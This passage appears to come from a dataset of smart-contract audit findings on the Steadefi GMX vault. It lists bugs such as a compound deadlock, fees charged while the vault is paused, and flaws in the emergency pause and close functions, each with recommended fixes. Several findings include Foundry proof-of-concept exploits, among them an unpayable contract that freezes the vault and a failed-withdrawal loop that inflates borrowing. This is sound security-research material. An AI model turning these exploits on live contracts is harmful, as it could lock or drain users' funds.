Consequently, the `amountIn` will be zero, and in this case the compound logic will be skipped.\\n```\\n uint256 _tokenInAmt = IERC20(cp.tokenIn).balanceOf(address(this));\\n\\n // Only compound if tokenIn amount is more than 0\\n if (_tokenInAmt > 0) {\\n //compound logic\\n //// rest of code.\\n }\\n```\\n\\nAs a result, the status will remain `compound_failed`, leading to a deadlock. If the keeper continues to call this function, no progress will be made and only gas will be wasted. Furthermore, all interactions with the protocol are impossible while the status is `compound_failed`.
incorrect handling of compound cancellation leaves the vault stuck at `compound_failed` status\\nIn the event a deposit gets cancelled while trying to compound, just add liquidity again without the swapping logic.
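A sketch of such a retry path, reusing the types from the snippets above (the function name `compoundRetry` and its exact wiring are assumptions):\\n```\\n function compoundRetry(GMXTypes.Store storage self, GMXTypes.CompoundParams memory cp) external {\\n // only callable while stuck after a cancelled compound deposit\\n if (self.status != GMXTypes.Status.Compound_Failed) revert Errors.NotAllowedInCurrentVaultStatus();\\n\\n self.refundee = payable(msg.sender);\\n\\n // the swap already succeeded before the cancellation, so skip it and\\n // simply re-add whatever tokenA/tokenB sits in the vault as liquidity\\n GMXTypes.AddLiquidityParams memory _alp;\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.minMarketTokenAmt =\\n GMXManager.calcMinMarketSlippageAmt(self, self.compoundCache.depositValue, cp.slippage);\\n _alp.executionFee = cp.executionFee;\\n\\n self.status = GMXTypes.Status.Compound;\\n self.compoundCache.depositKey = GMXManager.addLiquidity(self, _alp);\\n }\\n```\\n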
The strategy vault is stuck at `compound_failed` status, preventing any interaction with the protocol.\\nThe keeper may waste a lot of gas trying to handle this situation.
```\\n function compound(GMXTypes.Store storage self, GMXTypes.CompoundParams memory cp) external {\\n if (self.tokenA.balanceOf(address(self.trove)) > 0) {\\n self.tokenA.safeTransferFrom(address(self.trove), address(this), self.tokenA.balanceOf(address(self.trove)));\\n }\\n if (self.tokenB.balanceOf(address(self.trove)) > 0) {\\n self.tokenB.safeTransferFrom(address(self.trove), address(this), self.tokenB.balanceOf(address(self.trove)));\\n }\\n\\n uint256 _tokenInAmt = IERC20(cp.tokenIn).balanceOf(address(this));\\n\\n // Only compound if tokenIn amount is more than 0\\n if (_tokenInAmt > 0) {\\n self.refundee = payable(msg.sender); // the msg.sender is the keeper.\\n\\n self.compoundCache.compoundParams = cp; // storage update.\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage; // minSlippage may cause a revert, leaving the tokens in this contract.\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp); // return value not checked.\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n // returns zero when both balances are zero\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self, address(self.tokenA), self.tokenA.balanceOf(address(this))\\n ) + GMXReader.convertToUsdValue(self, address(self.tokenB), self.tokenB.balanceOf(address(this)));\\n // reverts if value is zero, status is not Open or Compound_Failed, or executionFee < minExecutionFee.\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt =\\n GMXManager.calcMinMarketSlippageAmt(self, self.compoundCache.depositValue, cp.slippage);\\n\\n _alp.executionFee = cp.executionFee;\\n self.compoundCache.depositKey = GMXManager.addLiquidity(self, _alp);\\n }\\n```\\n
The protocol will mint unnecessary fees if the vault is paused and reopened later.
medium
Unnecessary fees will be minted to the treasury if the vault is paused and reopened later.\\nBased on the test results, the protocol mints 5 wei (this can be more) of `gvToken` for each `gvToken` every second since the last fee collection. For example, if the `totalSupply` of `gvToken` is 1000000e18 and the time difference between the current block and the last fee collection is 10 seconds, the amount of LP tokens minted as a fee will be 50000000 wei of `gvToken`. This is acceptable when the protocol is functioning properly.\\n```\\nfunction pendingFee(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n uint256 _secondsFromLastCollection = block.timestamp - self.lastFeeCollected;\\n return (totalSupply_ * self.feePerSecond * _secondsFromLastCollection) / SAFE_MULTIPLIER;\\n }\\n```\\n\\nHowever, if the protocol needs to be paused due to a hack or other issues and the vault is then reopened, say after 1 month of being paused, the time difference `_secondsFromLastCollection` (i.e., `block.timestamp - lastFeeCollected`) will be 2630000s.\\nIf the first user tries to deposit after the vault reopens, the fees charged will be 1000000e18 * 5 * 2630000 / 1e18 = 13150000000000.\\nThis is an unnecessary fee generated for the treasury: the vault was paused for a long time, but the fee is still generated without taking that into account. This can result in the treasury consuming a portion of the user shares.
If the vault is being reopened, there should be a function that resets `_store.lastFeeCollected` to the current `block.timestamp`.
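For example (a minimal sketch against the storage quoted above; the function name and `onlyOwner` guard are assumptions):\\n```\\n function resetLastFeeCollected() external onlyOwner {\\n // only meaningful while the vault is paused and about to be resumed\\n if (_store.status != GMXTypes.Status.Paused) revert Errors.NotAllowedInCurrentVaultStatus();\\n // restart the fee clock so the paused interval accrues no fees\\n _store.lastFeeCollected = block.timestamp;\\n }\\n```\\n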
This will lead to a loss of user shares for the duration when the vault was not active. The severity of the impact depends on the fee the protocol charges per second, the totalSupply of vault tokens, and the duration of the vault being paused.
```\\nfunction pendingFee(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n uint256 _secondsFromLastCollection = block.timestamp - self.lastFeeCollected;\\n return (totalSupply_ * self.feePerSecond * _secondsFromLastCollection) / SAFE_MULTIPLIER;\\n }\\n```\\n
`emergencyPause` does not check the state before running and can cause loss of funds for users
medium
The `emergencyPause` function in the GMX smart contract can be called by the keeper at any time without pre-transaction checks. In some cases this could result in financial loss for users if the function is executed before pending callbacks have executed.\\nThe emergencyPause function lacks a control mechanism to prevent execution while callbacks are pending. While it is designed to halt all contract activities in an emergency, its unrestricted execution could disrupt ongoing transactions. For example, if a user calls a function like deposit, which involves multiple steps and expects a callback, and emergencyPause is invoked before the callback is executed, the user might lose their funds, as they will not be able to mint svTokens.\\nSince `emergencyPause` updates the state of the Vault to `GMXTypes.Status.Paused`, nothing happens when the GMX callback executes `afterDepositExecution`, because none of the conditions are met. This means that the deposited amount is never matched by a mint of svTokens.\\n```\\n function afterDepositExecution(\\n bytes32 depositKey,\\n IDeposit.Props memory /* depositProps */,\\n IEvent.Props memory /* eventData */\\n ) external onlyController {\\n GMXTypes.Store memory _store = vault.store();\\n\\n if (\\n _store.status == GMXTypes.Status.Deposit &&\\n _store.depositCache.depositKey == depositKey\\n ) {\\n vault.processDeposit();\\n } else if (\\n _store.status == GMXTypes.Status.Rebalance_Add &&\\n _store.rebalanceCache.depositKey == depositKey\\n ) {\\n vault.processRebalanceAdd();\\n } else if (\\n _store.status == GMXTypes.Status.Compound &&\\n _store.compoundCache.depositKey == depositKey\\n ) {\\n vault.processCompound();\\n } else if (\\n _store.status == GMXTypes.Status.Withdraw_Failed &&\\n _store.withdrawCache.depositKey == depositKey\\n ) {\\n vault.processWithdrawFailureLiquidityAdded();\\n } else if (_store.status == GMXTypes.Status.Resume) {\\n // This if block is to catch the Deposit callback after an\\n // emergencyResume() to set the vault status to Open\\n vault.processEmergencyResume();\\n }\\n \\n\\n@ > // The function does nothing as the conditions are not met\\n }\\n```\\n\\nIf, by any chance, the `processDeposit` function is executed (or any other function from the callback), it will still revert in the beforeChecks (like beforeProcessDepositChecks).\\n```\\n function beforeProcessDepositChecks(\\n GMXTypes.Store storage self\\n ) external view {\\n if (self.status != GMXTypes.Status.Deposit)\\n revert Errors.NotAllowedInCurrentVaultStatus();\\n }\\n```\\n
To mitigate this risk, the following recommendations should be implemented:\\nIntroduce a state check mechanism that prevents emergencyPause from executing if there are pending critical operations that must be completed to ensure the integrity of in-progress transactions.\\nImplement a secure check that allows emergencyPause to queue behind critical operations, ensuring that any ongoing transaction can complete before the pause takes effect.
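A sketch of the first recommendation, assuming the quoted `GMXTypes.Status` values are the in-flight states that are still waiting on a GMX callback:\\n```\\n function emergencyPause(GMXTypes.Store storage self) external {\\n // refuse to pause while a user flow is mid-flight and still waiting\\n // on a GMX callback; the keeper should retry once it has settled\\n if (\\n self.status == GMXTypes.Status.Deposit ||\\n self.status == GMXTypes.Status.Withdraw ||\\n self.status == GMXTypes.Status.Compound ||\\n self.status == GMXTypes.Status.Rebalance_Add\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n\\n // rest of code (existing removeLiquidity logic)\\n\\n self.status = GMXTypes.Status.Paused;\\n }\\n```\\n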
If the emergency pause is triggered at an inopportune time, it could:\\nPrevent the completion of in-progress transactions.\\nLead to loss of funds if the transactions are not properly rolled back.\\nErode user trust in the system due to the potential for funds to be stuck without recourse.\\nPOC:\\nCopy this test into GMXEmergencyTest.t.sol, then run it with `forge test --mt test_UserLosesFundsAfterEmergencyPause`:\\n```\\n function test_UserLosesFundsAfterEmergencyPause() external {\\n deal(address(WETH), user1, 20 ether);\\n uint256 wethBalanceBefore = IERC20(WETH).balanceOf(user1);\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 10e18, 1, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n vm.prank(owner);\\n vault.emergencyPause();\\n\\n vm.prank(user1);\\n mockExchangeRouter.executeDeposit(\\n address(WETH),\\n address(USDC),\\n address(vault),\\n address(callback)\\n );\\n uint256 wethBalanceAfter = IERC20(WETH).balanceOf(user1);\\n //Check that no tokens have been minted to user while user loses funds = 10 eth\\n assertEq(IERC20(vault).balanceOf(user1), 0);\\n assertEq(wethBalanceAfter, wethBalanceBefore - 10 ether);\\n\\n }\\n```\\n
```\\n function afterDepositExecution(\\n bytes32 depositKey,\\n IDeposit.Props memory /* depositProps */,\\n IEvent.Props memory /* eventData */\\n ) external onlyController {\\n GMXTypes.Store memory _store = vault.store();\\n\\n if (\\n _store.status == GMXTypes.Status.Deposit &&\\n _store.depositCache.depositKey == depositKey\\n ) {\\n vault.processDeposit();\\n } else if (\\n _store.status == GMXTypes.Status.Rebalance_Add &&\\n _store.rebalanceCache.depositKey == depositKey\\n ) {\\n vault.processRebalanceAdd();\\n } else if (\\n _store.status == GMXTypes.Status.Compound &&\\n _store.compoundCache.depositKey == depositKey\\n ) {\\n vault.processCompound();\\n } else if (\\n _store.status == GMXTypes.Status.Withdraw_Failed &&\\n _store.withdrawCache.depositKey == depositKey\\n ) {\\n vault.processWithdrawFailureLiquidityAdded();\\n } else if (_store.status == GMXTypes.Status.Resume) {\\n // This if block is to catch the Deposit callback after an\\n // emergencyResume() to set the vault status to Open\\n vault.processEmergencyResume();\\n }\\n \\n\\n@ > // The function does nothing as the conditions are not met\\n }\\n```\\n
try-catch does not store the state when it is reverted
high
If a withdrawal from GMX is successful without any errors, the borrowed amount is repaid to the lending vaults within a try-catch block inside the processWithdraw function. Subsequently, the afterWithdrawChecks are performed. If a revert occurs during this step, everything executed within the try-catch block is reverted, and the Vault's status is set to 'Withdraw_Failed.' In such a scenario, a Keeper must call the processWithdrawFailure function. In this case, there is an erroneous attempt to borrow from the LendingVaults again, even though the repayment never actually occurred due to the revert within the try-catch block.\\nHere is a POC that demonstrates how a user can exploit this bug by intentionally causing the afterWithdrawChecks to fail, resulting in additional borrowing from the LendingVault in the processWithdrawFailure function.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from "forge-std/Test.sol";\\nimport { TestUtils } from "../../helpers/TestUtils.sol";\\nimport { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol";\\nimport { GMXMockVaultSetup } from "./GMXMockVaultSetup.t.sol";\\nimport { GMXTypes } from "../../../contracts/strategy/gmx/GMXTypes.sol";\\nimport { GMXTestHelper } from "./GMXTestHelper.sol";\\n\\nimport { IDeposit } from "../../../contracts/interfaces/protocols/gmx/IDeposit.sol";\\nimport { IEvent } from "../../../contracts/interfaces/protocols/gmx/IEvent.sol";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC1() public {\\n //Owner deposits 1 ether in vault\\n vm.startPrank(owner);\\n _createDeposit(address(WETH), 1 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n\\n //User1 deposits 1 ether in vault\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 1 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n \\n //Variables for assertion\\n uint256 leverageBefore = vault.leverage();\\n (,uint256 debtAmtTokenBBefore) = vault.debtAmt();\\n\\n uint256 vaultSharesAmount = IERC20(address(vault)).balanceOf(user1); //Vault shares to withdraw\\n GMXTypes.Store memory _store;\\n for(uint256 i; i < 5; i++) {\\n vm.startPrank(user1);\\n //User1 tries to withdraw all of his deposits and enters an unrealistically high amount as the minWithdrawAmt (10000 ether) to intentionally make the afterWithdrawChecks fail\\n _createAndExecuteWithdrawal(address(WETH), address(USDC), address(USDC), vaultSharesAmount, 10000 ether, SLIPPAGE, EXECUTION_FEE);\\n\\n _store = vault.store();\\n assert(uint256(_store.status) == uint256(GMXTypes.Status.Withdraw_Failed)); //Since the afterWithdrawChecks have failed, the Vault status is Withdraw_Failed\\n\\n //Keeper calls processWithdrawFailure to deposit the withdrawn tokens back into GMX, mistakenly borrowing something from the LendingVaults in the process.\\n vault.processWithdrawFailure{value: EXECUTION_FEE}(SLIPPAGE, EXECUTION_FEE);\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n vm.stopPrank();\\n } //The for-loop is there to demonstrate that a user can easily execute the process multiple times to increase \\n //the debt and leverage. 
(The user can do it as long as the Lending Vaults have liquidity.)\\n\\n //Variables for assertion\\n uint256 leverageAfter = vault.leverage();\\n (,uint256 debtAmtTokenBAfter) = vault.debtAmt();\\n\\n //Shows that after the failed withdrawal process, debt and leverage are higher. (Token A is irrelevant as Delta is Long)\\n assert(debtAmtTokenBAfter > debtAmtTokenBBefore);\\n assert(leverageAfter > leverageBefore);\\n\\n console.log("DebtAmtBefore: %s", debtAmtTokenBBefore);\\n console.log("DebtAmtAfter: %s", debtAmtTokenBAfter);\\n console.log("leverageBefore: %s", leverageBefore);\\n console.log("leverageAfter: %s", leverageAfter);\\n }\\n}\\n```\\n\\nThe PoC can be started with this command: `forge test --match-test test_POC1 -vv`
In processWithdrawFailure, no more borrowing should occur:\\n```\\nFile: contracts/strategy/gmx/GMXWithdraw.sol#processWithdrawFailure\\nGMXManager.borrow(\\n self,\\n self.withdrawCache.repayParams.repayTokenAAmt,\\n self.withdrawCache.repayParams.repayTokenBAmt\\n);\\n```\\n\\nThese lines of code should be deleted
Users can intentionally deplete the capacity of a lending vault to increase the leverage of a vault. This also results in lending vaults having no capacity left for new deposits. As a result, the utilization rate increases significantly, leading to higher borrowing costs.
```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from "forge-std/Test.sol";\\nimport { TestUtils } from "../../helpers/TestUtils.sol";\\nimport { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol";\\nimport { GMXMockVaultSetup } from "./GMXMockVaultSetup.t.sol";\\nimport { GMXTypes } from "../../../contracts/strategy/gmx/GMXTypes.sol";\\nimport { GMXTestHelper } from "./GMXTestHelper.sol";\\n\\nimport { IDeposit } from "../../../contracts/interfaces/protocols/gmx/IDeposit.sol";\\nimport { IEvent } from "../../../contracts/interfaces/protocols/gmx/IEvent.sol";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC1() public {\\n //Owner deposits 1 ether in vault\\n vm.startPrank(owner);\\n _createDeposit(address(WETH), 1 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n\\n //User1 deposits 1 ether in vault\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 1 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n \\n //Variables for assertion\\n uint256 leverageBefore = vault.leverage();\\n (,uint256 debtAmtTokenBBefore) = vault.debtAmt();\\n\\n uint256 vaultSharesAmount = IERC20(address(vault)).balanceOf(user1); //Vault shares to withdraw\\n GMXTypes.Store memory _store;\\n for(uint256 i; i < 5; i++) {\\n vm.startPrank(user1);\\n //User1 tries to withdraw all of his deposits and enters an unrealistically high amount as the minWithdrawAmt (10000 ether) to intentionally make the afterWithdrawChecks fail\\n _createAndExecuteWithdrawal(address(WETH), address(USDC), address(USDC), vaultSharesAmount, 10000 ether, SLIPPAGE, EXECUTION_FEE);\\n\\n _store = vault.store();\\n assert(uint256(_store.status) == uint256(GMXTypes.Status.Withdraw_Failed)); //Since the afterWithdrawChecks have failed, the Vault status is Withdraw_Failed\\n\\n //Keeper calls processWithdrawFailure to deposit the withdrawn tokens back into GMX, mistakenly borrowing something from the LendingVaults in the process.\\n vault.processWithdrawFailure{value: EXECUTION_FEE}(SLIPPAGE, EXECUTION_FEE);\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n vm.stopPrank();\\n } //The for-loop is there to demonstrate that a user can easily execute the process multiple times to increase \\n //the debt and leverage. (The user can do it as long as the Lending Vaults have liquidity.)\\n\\n //Variables for assertion\\n uint256 leverageAfter = vault.leverage();\\n (,uint256 debtAmtTokenBAfter) = vault.debtAmt();\\n\\n //Shows that after the failed withdrawal process, debt and leverage are higher. (Token A is irrelevant as Delta is Long)\\n assert(debtAmtTokenBAfter > debtAmtTokenBBefore);\\n assert(leverageAfter > leverageBefore);\\n\\n console.log("DebtAmtBefore: %s", debtAmtTokenBBefore);\\n console.log("DebtAmtAfter: %s", debtAmtTokenBAfter);\\n console.log("leverageBefore: %s", leverageBefore);\\n console.log("leverageAfter: %s", leverageAfter);\\n }\\n}\\n```\\n
Setter functions for core GMX contracts
medium
GMX docs state that their `ExchangeRouter` and `GMXOracle` contracts `will` change as new logic is added. Therefore, setter functions should be added to `GMXVault.sol` to be able to update the state variables storing those addresses when the need arises.\\nFrom the GMX docs:\\n```\\nIf using contracts such as the ExchangeRouter, Oracle or Reader do note that their addresses will change as new logic is added\\n```\\n
Create setter functions in `GMXVault.sol` as below:\\n```\\n function updateExchangeRouter(address exchangeRouter) external onlyOwner {\\n _store.exchangeRouter = exchangeRouter;\\n emit ExchangeRouterUpdated(exchangeRouter);\\n }\\n\\n function updateGMXOracle(address gmxOracle) external onlyOwner {\\n _store.gmxOracle = gmxOracle;\\n emit GMXOracleUpdated(gmxOracle);\\n }\\n```\\n
Without the ability to update the `ExchangeRouter` and `GMXOracle` addresses, the protocol would effectively be unusable, given the importance of these contracts.
```\\nIf using contracts such as the ExchangeRouter, Oracle or Reader do note that their addresses will change as new logic is added\\n```\\n
`GMXVault` can be blocked by a malicious actor
high
`GMXVault` can be blocked by a malicious actor who makes a `depositNative` call from an unpayable contract whose deposit is then cancelled by the GMX exchange router (a 3rd party).\\nUsers can deposit native tokens in vaults where either token of the pair is WNT (wrapped native token) by calling the payable `GMXVault.depositNative` function with the required deposit parameters (token, amount, minimum share amount, slippage, and execution fee); this function then invokes `GMXDeposit.deposit` with a `msg.value` equal to the amount the user wants to deposit plus execution fees.\\nIn GMXDeposit.deposit, various checks are made to ensure the sanity of the deposit parameters and the eligibility of the user to deposit, and to calculate the required `tokenA` and `tokenB` amounts to deposit into the `GMX` protocol; the sent native tokens are then deposited in the WNT contract and an equivalent amount of WNT is transferred to the vault.\\nBefore the call to `GMXManager.addLiquidity` (which in turn calls the `GMX.exchangeRouter` contract) to add liquidity, the vault status is checked to be `Open`; if so, the status is set to `Deposit` so that no more deposits or withdrawals can be made (the vault is blocked until the operation completes).\\nIf the operation succeeds in the `GMX` exchange router, the vault callback invokes the `processDeposit` function to finish the process and update the vault status to `Open`.\\nIf the liquidity addition is cancelled by the `GMX` exchange router (3rd party), the vault callback invokes the `processDepositCancellation` function to roll back the process by repaying the lendingVaults debts and paying back the native tokens sent by the user, then updates the vault status to `Open` so that the vault is open again for deposits and withdrawals.\\nUsually the deposit (liquidity addition to the `GMX` protocol) fails if the user sets a very high slippage parameter when making a deposit (dp.slippage).\\nHow can this be exploited to block the vault? 
Imagine the following scenario:\\nA malicious user deploys an unpayable contract (one that cannot receive native tokens) and calls the `GMXVault.depositNative` function with a very high slippage to ensure that the deposit will be cancelled by the GMX exchange router.\\nWhen the deposit is cancelled and the vault callback's `processDepositCancellation` function is invoked by the router, it will revert, as it tries to send the native tokens back to the user who made the deposit (which is the unpayable contract in our case).\\nThe status of the vault will then be stuck in the `Deposit` state, so no more deposits or withdrawals can be made and the vault will be disabled.\\nThe same scenario will happen if the user gets blocklisted later by the deposited token contract (tokenA or tokenB), but the probability of this happening is very low, as the GMX exchange router adds liquidity in two transactions with a small time separation between them!\\nCode Instances:\\nGMXVault.depositNative\\n```\\n function depositNative(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, true);\\n }\\n```\\n\\nGMXDeposit.deposit /L88\\n```\\n_dc.user = payable(msg.sender);\\n```\\n\\nGMXDeposit.processDepositCancellation /L209-210\\n```\\n(bool success, ) = self.depositCache.user.call{value: address(this).balance}("");\\n require(success, "Transfer failed.");\\n```\\n\\nFoundry PoC:\\nA `BlockerContract.sol` is added to mimic the behaviour of an unpayable contract. Add the following contract at `2023-10-SteadeFi/test/gmx/local/BlockerContract.sol`:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\n\\nimport {GMXTypes} from "../../../contracts/strategy/gmx/GMXTypes.sol";\\nimport {GMXVault} from "../../../contracts/strategy/gmx/GMXVault.sol";\\n\\ncontract BlockerContract {\\n constructor() payable {}\\n\\n function callVault(\\n address payable _vaultAddress,\\n GMXTypes.DepositParams memory dp\\n ) external {\\n GMXVault targetVault = GMXVault(_vaultAddress);\\n targetVault.depositNative{value: address(this).balance}(dp);\\n }\\n}\\n```\\n\\nA `test_processDepositCancelWillBlockVault` test is added to `2023-10-SteadeFi/test/gmx/local/GMXDepositTest.sol`, where the blockerContract is deployed with some native tokens to cover the deposit amount + execution fees; this contract then calls `depositNative` via `BlockerContract.callVault`, the exchange router tries to cancel the deposit but will not be able to, as the BlockerContract can't receive back the deposited native tokens, and the vault will be blocked.\\nAdd this import statement and test to the `GMXDepositTest.sol` file:\\n`import {BlockerContract} from "./BlockerContract.sol";`\\n```\\n function test_processDepositCancelWillBlockVault() external {\\n //1. deploy the blockerContract contract with a msg.value=deposit amount + execution fees:\\n uint256 depositAmount = 1 ether;\\n\\n BlockerContract blockerContract = new BlockerContract{\\n value: depositAmount + EXECUTION_FEE\\n }();\\n\\n //check balance before deposit:\\n uint256 blockerContractEthBalance = address(blockerContract).balance;\\n assertEq(depositAmount + EXECUTION_FEE, blockerContractEthBalance);\\n\\n //2. preparing deposit params to call "depositNative" via the blockerContract:\\n depositParams.token = address(WETH);\\n depositParams.amt = depositAmount;\\n depositParams.minSharesAmt = 0;\\n depositParams.slippage = SLIPPAGE;\\n depositParams.executionFee = EXECUTION_FEE;\\n\\n blockerContract.callVault(payable(address(vault)), depositParams);\\n\\n // vault status is "Deposit":\\n assertEq(uint256(vault.store().status), 1);\\n\\n //3. the router tries to cancel the deposit, but the refund fails because the blockerContract is an unpayable contract:\\n vm.expectRevert();\\n mockExchangeRouter.cancelDeposit(\\n address(WETH),\\n address(USDC),\\n address(vault),\\n address(callback)\\n );\\n\\n // vault status will be stuck at "Deposit":\\n assertEq(uint256(vault.store().status), 1);\\n\\n // check balance after cancelling the deposit, where it will be less than the original as no refund has been paid (the blockerContract is unpayable):\\n assertLt(address(blockerContract).balance, blockerContractEthBalance);\\n }\\n```\\n\\nTest result:\\n```\\n$ forge test --mt test_processDepositCancelWillBlockVault\\nRunning 1 test for test/gmx/local/GMXDepositTest.sol:GMXDepositTest\\n[PASS] test_processDepositCancelWillBlockVault() (gas: 1419036)\\nTest result: ok. 1 passed; 0 failed; 0 skipped; finished in 24.62ms\\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)\\n```\\n
Add a mechanism that lets the user redeem cancelled deposits themselves (pull) instead of sending the funds back to them (push).
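A sketch of the pull pattern (the `pendingRefunds` field and `claimRefund` function are hypothetical additions, not Steadefi code):\\n```\\n// hypothetical field added to GMXTypes.Store:\\n// mapping(address => uint256) pendingRefunds;\\n\\nfunction processDepositCancellation(GMXTypes.Store storage self) external {\\n GMXChecks.beforeProcessDepositCancellationChecks(self);\\n // rest of code (repay lending vaults, etc.)\\n\\n // record the refund instead of pushing it, so an unpayable\\n // receiver can no longer block the status transition\\n self.pendingRefunds[self.depositCache.user] += self.depositCache.depositParams.amt;\\n self.status = GMXTypes.Status.Open;\\n\\n emit DepositCancelled(self.depositCache.user);\\n}\\n\\nfunction claimRefund(GMXTypes.Store storage self) external {\\n uint256 amt = self.pendingRefunds[msg.sender];\\n self.pendingRefunds[msg.sender] = 0; // zero before sending to block reentrancy\\n (bool success, ) = msg.sender.call{value: amt}("");\\n require(success, "Transfer failed.");\\n}\\n```\\n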
The vault will be blocked as it will be stuck in the `Deposit` state; so no more deposits or withdrawals can be made.
```\\n function depositNative(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, true);\\n }\\n```\\n
Emergency Closed Vault Can Be Paused Then Resumed
medium
The `emergencyClose` function is intended to be a final measure to repay all debts and shut down the vault permanently, as indicated by the function's documentation. This action should be irreversible to ensure the finality and security of the vault's emergency closure process.\\n```\\nFile: GMXVault.sol\\n /**\\n * @notice Repays all debt owed by vault and shut down vault, allowing emergency withdrawals\\n * @dev Note that this is a one-way irreversible action\\n * @dev Should be called by approved Owner (Timelock + MultiSig)\\n * @param deadline Timestamp of swap deadline\\n */\\n function emergencyClose(uint256 deadline) external onlyOwner {\\n GMXEmergency.emergencyClose(_store, deadline);\\n }\\n```\\n\\nHowever, a pathway exists to effectively reopen a vault after it has been closed using `emergencyClose` by invoking the `emergencyPause` and `emergencyResume` functions. These functions alter the vault's status, allowing for the resumption of operations, which contradicts the intended irreversible nature of an emergency close.\\n```\\nFile: GMXEmergency.sol\\n function emergencyPause(\\n GMXTypes.Store storage self\\n ) external {\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // Remove all of the vault's LP tokens\\n _rlp.lpAmt = self.lpToken.balanceOf(address(this));\\n _rlp.executionFee = msg.value;\\n\\n GMXManager.removeLiquidity(\\n self,\\n _rlp\\n );\\n\\n self.status = GMXTypes.Status.Paused;\\n\\n emit EmergencyPause();\\n }\\n```\\n\\n```\\nFile: GMXEmergency.sol\\n function emergencyResume(\\n GMXTypes.Store storage self\\n ) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.executionFee = msg.value;\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n\\nAdd this to GMXEmergencyTest.t.sol and test with forge test --mt test_close_then_pause -vv:\\n```\\n function test_close_then_pause() external {\\n // Pause the vault\\n vault.emergencyPause();\\n console2.log("vault status", uint256(vault.store().status));\\n\\n // Close the vault\\n vault.emergencyClose(deadline);\\n console2.log("vault status", uint256(vault.store().status));\\n\\n // Pause the vault again\\n vault.emergencyPause();\\n console2.log("vault status", uint256(vault.store().status));\\n assertEq(uint256(vault.store().status), 10, "vault status not set to paused");\\n\\n // Resume the vault\\n vault.emergencyResume();\\n console2.log("vault status", uint256(vault.store().status));\\n }\\n```\\n
Implement a permanent state or flag within the vault's storage to irrevocably mark the vault as closed after `emergencyClose` is called. This flag should prevent any further state-altering operations.\\nModify the `emergencyPause` and `emergencyResume` functions to check for this permanent closure flag and revert if the vault has been emergency closed.
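A sketch combining both recommendations (the `closedForever` flag and the error name are hypothetical additions to `GMXVault.sol`):\\n```\\n bool public closedForever; // one-way flag, never unset\\n\\n function emergencyClose(uint256 deadline) external onlyOwner {\\n GMXEmergency.emergencyClose(_store, deadline);\\n closedForever = true; // permanent: no code path ever clears this\\n }\\n\\n function emergencyPause() external payable {\\n if (closedForever) revert Errors.VaultPermanentlyClosed(); // hypothetical error\\n GMXEmergency.emergencyPause(_store);\\n }\\n\\n function emergencyResume() external payable {\\n if (closedForever) revert Errors.VaultPermanentlyClosed();\\n GMXEmergency.emergencyResume(_store);\\n }\\n```\\n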
The impact of this finding is significant, as it undermines the trust model of the emergency close process. Users and stakeholders expect that once a vault is closed in an emergency, it will remain closed as a protective measure. The ability to resume operations after an emergency closure could expose the vault to additional risks and potentially be exploited by malicious actors, especially if the original closure was due to a security threat.
